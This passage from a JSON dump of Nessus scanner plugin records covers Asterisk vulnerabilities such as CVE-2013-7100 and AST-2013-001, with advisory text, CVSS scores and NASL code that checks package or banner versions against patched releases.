audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.7.0-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:47", "description": "Jan Juergens discovered a buffer overflow in the parser for SMS messages in Asterisk.\n\nAn additional change was backported, which is fully described in http://downloads.asterisk.org/pub/security/AST-2013-007.html\n\nWith the fix for AST-2013-007, a new configuration option was added in order to allow the system administrator to disable the expansion of'dangerous' functions 
(such as SHELL()) from any interface which is not the dialplan. In stable and oldstable this option is disabled by default, i.e. installing the update alone does not restrict these functions. To enable the restriction, add the following line to the section '[options]' in /etc/asterisk/asterisk.conf and restart asterisk:\n\nlive_dangerously = no", "cvss3": {}, "published": "2014-01-08T00:00:00", "type": "nessus", "title": "Debian DSA-2835-1 : asterisk - buffer overflow", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2835.NASL", "href": "https://www.tenable.com/plugins/nessus/71848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2835. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71848);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_bugtraq_id(64364);\n script_xref(name:\"DSA\", value:\"2835\");\n\n script_name(english:\"Debian DSA-2835-1 : asterisk - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jan Juergens discovered a buffer overflow in the parser for SMS\nmessages in Asterisk.\n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.html\n\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system administrator to disable the expansion\nof'dangerous' functions (such as SHELL()) from any interface which is\nnot the dialplan. In stable and oldstable this option is disabled by\ndefault. 
To enable it add the following line to the section\n'[options]' in /etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=732355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2835\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 
(C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-config\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dahdi\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dbg\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dev\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-doc\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) 
flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mobile\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-modules\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mp3\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mysql\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-ooh323\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1:1.8.13.1~dfsg1-3+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:25:49", "description": "- Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.7.0-1 :\n\n - The Asterisk Development Team has announced the release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-01-09T00:00:00", "type": "nessus", "title": "Fedora 20 : asterisk-11.7.0-1.fc20 (2013-24108)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2013-24108.NASL", "href": "https://www.tenable.com/plugins/nessus/71868", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-24108.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71868);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_xref(name:\"FEDORA\", value:\"2013-24108\");\n\n script_name(english:\"Fedora 20 : asterisk-11.7.0-1.fc20 (2013-24108)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.7.0-1 :\n\n - The Asterisk Development Team has announced the\n release of Asterisk 
11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043918\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ca40482\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"asterisk-11.7.0-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:46", "description": "- Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.7.0-1 :\n\n - The Asterisk Development Team has announced the release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora 
security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-01-09T00:00:00", "type": "nessus", "title": "Fedora 19 : asterisk-11.7.0-1.fc19 (2013-24119)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2013-24119.NASL", "href": "https://www.tenable.com/plugins/nessus/71870", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-24119.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71870);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_xref(name:\"FEDORA\", value:\"2013-24119\");\n\n script_name(english:\"Fedora 19 : asterisk-11.7.0-1.fc19 (2013-24119)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.7.0-1 :\n\n - The Asterisk Development Team has announced the\n release of 
Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043918\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125891.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d832fa82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"asterisk-11.7.0-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:15", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a buffer overflow vulnerability related to SIP SDP headers and h264 video handling. 
This error could allow execution of arbitrary code.", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk SIP SDP Buffer Overflow (AST-2013-001)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_001.NASL", "href": "https://www.tenable.com/plugins/nessus/65896", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65896);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2685\");\n script_bugtraq_id(58760);\n\n script_name(english:\"Asterisk SIP SDP Buffer Overflow (AST-2013-001)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a buffer overflow\nvulnerability related to SIP SDP headers and h264 video handling. 
This\nerror could allow execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-20901\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 11.2.2 or apply the patch listed in the Asterisk\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2685\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 11x < 11.2.2\n if (version =~ \"^11\\.([01]|2\\.[01])([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + 
'\\n';\n security_hole(port:port, proto:proto, extra:report);\n }\n else security_hole(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:22", "description": "The Asterisk Development Team has announced security releases for Certified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. The available security releases are released as versions 1.8.15-cert2, 1.8.20.2, 10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format negotiation. The format attribute resource for H.264 video performs an unsafe read against a media attribute when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a fix for Asterisk's HTTP server for a remotely-triggered crash. 
While the fix prevented the crash from being triggered, a denial of service vector still exists with that solution if an attacker sends one or more HTTP POST requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP channel driver. When authenticating a SIP request with alwaysauthreject enabled, allowguest disabled, and autocreatepeer disabled, Asterisk discloses whether a user exists for INVITE, SUBSCRIBE, and REGISTER transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security advisories.\n\nFor more information about the details of these vulnerabilities, please read security advisories AST-2013-001, AST-2013-002, and AST-2013-003, which were released at the same time as this announcement.\n\nFor a full list of changes in the current releases, please see the ChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.20.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2-digiumphones http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.2.2\n\nThe security advisories are available at :\n\n - http://downloads.asterisk.org/pub/security/AST-2013-001.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-002.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-003.pdf\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
